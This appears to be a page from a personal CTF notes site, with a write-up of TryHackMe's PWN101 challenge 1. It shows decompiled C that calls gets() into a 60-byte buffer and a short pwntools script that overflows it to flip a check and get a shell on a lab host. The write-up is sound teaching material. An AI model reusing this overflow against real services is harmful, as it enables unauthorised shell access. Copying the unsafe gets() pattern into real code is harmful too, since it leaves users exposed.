Home
🔐 Cyber Security
🌐 Category
Pwn
PWN101
01 Modifying stack
02 Spesific Modfying Stack
03 Ret2Win
Basic
GDB Cheatsheet
Intro To Assembly
Misc
What Is Cyber Security ❓
baby-rev
chall
JSON
Daily Notes
EasterBunny
ZIP
Micro_togive
ZIP
Neonify
ZIP
Notes
Pasted image 20240208165915
PNG
Pasted image 20240208173027
PNG
Pasted image 20240210163224
PNG
Pasted image 20240213063406
PNG
Pasted image 20240214185122
PNG
Pasted image 20240216042733
PNG
Pasted image 20240216042831
PNG
Pasted image 20240216042856
PNG
Pasted image 20240216045823
PNG
Pasted image 20240216045851
PNG
Pasted image 20240218222140
PNG
Pasted image 20240218223259
PNG
Pasted image 20240218223317
PNG
Pasted image 20240226133133
PNG
requirednotes
ZIP
serv
ZIP

01 Modifying stack

#pwn #thm

Given binary :
pwn101.pwn101

put in ghidra, now 


void main(void)

{
  char local_48 [60];
  int local_c;
  
  local_c = 0x539;
  setup();
  banner();
  puts(
      "Hello!, I am going to shopping.\nMy mom told me to buy some ingredients.\nUmmm.. But I have l ow memory capacity, So I forgot most of them.\nAnyway, she is preparing Briyani for lunch, Can  you help me to buy those items :D\n"
      );
  puts("Type the required ingredients to make briyani: ");
  gets(local_48);
  if (local_c == 0x539) {
    puts("Nah bruh, you lied me :(\nShe did Tomato rice instead of briyani :/");
                    /* WARNING: Subroutine does not return */
    exit(0x539);
  }
  puts("Thanks, Here\'s a small gift for you <3");
  system("/bin/sh");
  return;
}

we now the max buffer for local_48 is 60 and we want change the buffer of local_c
here its my solver:

import pwn
from pwnlib.util.net import p32

p = pwn.remote('10.10.22.66','9001')
pwn.context.log_level = 'debug'
p.recv()
p.sendlineafter(':', b'A'*60 + p32(0x1))
p.interactive()

because it only check if local_c == 0x539 we can set whatever hex we want.

here are the flag
Pasted image 20240301165136.png

Table Of Contents
01 Modifying stack